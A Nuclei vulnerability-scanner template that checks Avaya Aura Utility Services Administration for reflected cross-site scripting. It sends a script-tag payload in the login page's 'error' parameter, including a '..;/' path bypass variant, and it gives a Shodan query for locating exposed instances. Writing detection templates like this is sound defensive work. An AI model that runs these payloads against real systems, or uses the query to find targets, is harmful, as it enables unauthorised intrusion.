nuclei-templates/vulnerabilities/avaya/avaya-aura-xss.yaml

id: avaya-aura-xss

info:
  name: Avaya Aura Utility Services Administration - Cross Site Scripting
  author: DhiyaneshDk
  severity: medium
  reference:
    - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
    - https://download.avaya.com/css/public/documents/101076366
  metadata:
    verified: "true"
    shodan-query: html:"Avaya Aura"
  tags: xss,avaya,aura,iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
      - "{{BaseURL}}/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
          - 'Avaya Aura Device Services'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200